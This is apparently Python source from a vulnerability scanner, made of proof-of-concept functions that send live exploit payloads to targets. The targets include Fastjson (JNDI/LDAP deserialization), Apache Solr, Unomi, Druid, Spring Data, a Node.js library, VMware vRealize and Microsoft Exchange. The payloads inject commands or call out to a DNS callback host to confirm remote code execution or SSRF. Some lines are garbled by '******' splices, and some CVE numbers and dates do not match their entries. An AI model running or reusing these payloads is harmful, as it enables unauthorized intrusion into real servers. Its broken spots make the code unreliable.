def fastjson_1224_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.24"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-18349"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2017-03-15"
self.vul_info["vul_vers"] = "<= 1.2.24"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
self.vul_info["cre_date"] = "2021-01-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': "application/json",
'Connection': 'close'
}
md = dns_request()
dns = md
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://" + dns + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson(self, webapps_identify, url):
name = "Fastjson"
Identify.identify_prt(name)
dns = dns_request()
payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns
payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns
payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns
payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns
payload5 = '{"a":"'
headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
try:
try:
request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False)
except:
pass
if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
if r"application/json" == request.headers['Content-Type']:
webapps_identify.append("fastjson")
elif r"application/json" in request.headers['Content-Type']:
webapps_identify.append("fastjson")
else:
requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False)
if dns_result(dns):
webapps_identify.append("fastjson")
webapps_identify.append("fastjson [" + dns + "]")
except Exception as error:
pass
def cve_2020_13942_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Unomi remote code execution"
self.vul_info["vul_numb"] = "CVE-2020-13942"
self.vul_info["vul_apps"] = "Unomi"
self.vul_info["vul_date"] = "2020-11-23"
self.vul_info["vul_vers"] = "< 1.5.2"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
"漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
"攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
md = dns_request()
cmd = "ping " + md
self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
self.headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
req = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
else:
rep = list(
json.loads(req.text)
["trackedConditions"])[0]["parameterValues"]["pagePath"]
if r"/tracker/" in rep:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["prt_info"] = "[maybe]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_27905_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
self.vul_info["vul_numb"] = "CVE-2021-27905"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2021-04-14"
self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
dns = dns_request()
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
"=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
url_ssrf = urljoin(self.url, payload)
r = requests.get(url_ssrf,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns in dns_result(dns):
self.vul_info["vul_payd"] = url_ssrf
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson_1262_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.62"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "null"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2019-10-07"
self.vul_info["vul_vers"] = "<= 1.2.62"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
"(autoType功能默认关闭),另建议将JDK升级到最新版本。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
md = dns_request()
dns = md
data = {
"@type": "org.apache.xbean.propertyeditor.JndiConverter",
"AsText": "ldap://" + dns + "//exploit"
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25646"
self.vul_info["vul_apps"] = "Druid"
self.vul_info["vul_date"] = "2021-02-01"
self.vul_info["vul_vers"] = "< 0.20.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
"此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
"经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
"攻击者可直接构造恶意请求执行任意代码,控制服务器。"
self.vul_info["cre_date"] = "2021-02-03"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
md = dns_request()
cmd = "ping " + md
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21975_poc(self):
self.threadLock.acquire()
self.vul_info[
"prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "VMware vRealize Operations Manager API SSRF"
self.vul_info["vul_numb"] = "CVE-2021-21972"
self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2021-03-31"
self.vul_info["vul_vers"] = "<= 8.3.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
self.vul_info["cre_date"] = "2021-04-01"
self.vul_info["cre_auth"] = "zhzyker"
try:
headers = {
"User-Agent": self.ua,
"Content-Type": "application/json;charset=UTF-8"
}
dns = dns_request()
data = '["' + dns + '"]'
url = urljoin(self.url, "/casa/nodes/thumbprints")
res = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(dns):
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21315_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Node.JS Command Injection"
self.vul_info["vul_numb"] = "CVE-2021-21315"
self.vul_info["vul_apps"] = "Node.JS"
self.vul_info["vul_date"] = "2021-02-25"
self.vul_info["vul_vers"] = "Systeminformation < 5.3.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Command Injection"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection"
self.vul_info["cre_date"] = "2021-03-04"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Connection": "close"
}
md = dns_request()
cmd = "ping%20" + md
payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
url = self.url + payload
try:
try:
req = requests.get(url, headers=headers, timeout=3, verify=False)
r = dump.dump_all(req).decode('utf-8', 'ignore')
except:
r = "null"
pass
if dns_result(md):
self.vul_info["vul_data"] = r
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2018_1273_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2018-1273"
self.vul_info["vul_apps"] = "Spring"
self.vul_info["vul_date"] = "2018-04-11"
self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程命令执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
"攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
self.vul_info["cre_date"] = "2021-01-26"
self.vul_info["cre_auth"] = "zhzyker"
md = dns_request()
cmd = "ping " + md
payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2017_12629_poc(self):
self.threadLock.acquire()
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-12629"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2017-10-14"
self.vul_info["vul_vers"] = "< 7.1.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
"(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = "null"
new_core = random_md5()
md = dns_request()
cmd = "ping " + md
payload1 = self.payload_cve_2017_12629.replace(
"RECOMMAND", cmd).replace("new_core", new_core)
payload2 = '[{"id": "test"}]'
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
headers_solr1 = {
'Accept': "*/*",
'User-Agent': self.ua,
'Content-Type': "application/json"
}
headers_solr2 = {
'Host': "localhost",
'Accept-Language': "en",
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/json"
}
try:
request = requests.get(url_core,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
req = requests.post(self.url + "/solr/" + str(core_name) +
"/config",
data=payload1,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [newcore: " + new_core + "] "
else:
if request.status_code == 200 and core_name != "null" and core_name is not None:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [newcore: " + new_core + "] "
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_17558_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace(
"RECOMMAND", "whoami")
self.vul_info[
"vul_name"] = "Apache Solr Velocity template Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2019-17558"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2017-10-16"
self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
md = dns_request()
cmd = "ping " + md
payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
url_api = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {
'Content-Type': 'application/json',
'User-Agent': self.ua
}
set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
try:
r = requests.post(url_api,
data=set_api_data,
headers=headers_json,
timeout=self.timeout,
verify=False)
req = requests.get(self.url + "/solr/" + str(core_name) +
payload_2,
headers=self.headers,
timeout=self.timeout,
verify=False)
req = dump.dump_all(req).decode('utf-8', 'ignore')
r = dump.dump_all(r).decode('utf-8', 'ignore')
except:
req = "timeout"
r = "timeout"
if dns_result(md):
self.vul_info["vul_data"] = req
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
elif self.vul_info[
"prt_resu"] != "PoCSuCCeSS" and core_name is not None:
self.vul_info["vul_data"] = r
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_26855_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
self.vul_info["vul_numb"] = "CVE-2021-26855"
self.vul_info["vul_apps"] = "Exchange"
self.vul_info["vul_date"] = "2021-03-03"
self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
self.vul_info["cre_date"] = "2021-03-07"
self.vul_info["cre_auth"] = "zhzyker"
url = self.url + "/owa/auth/x.js"
dns = dns_request()
cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace(
"localhost", dns)
try:
headers = {
"User-agent": self.ua,
"Cookie": cookie_dns,
"Connection": "close"
}
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(dns):
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = headers["Cookie"]
self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[
"Cookie"] + "]"
else:
headers = {
"User-agent": self.ua,
"Cookie": cookie_local,
"Connection": "close"
}
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
if r"TargetUnknown" in res.text and r"localhost" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = headers["Cookie"]
self.vul_info[
"prt_info"] = "[ssrf] [maybe] [cookie: " + headers[
"Cookie"] + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
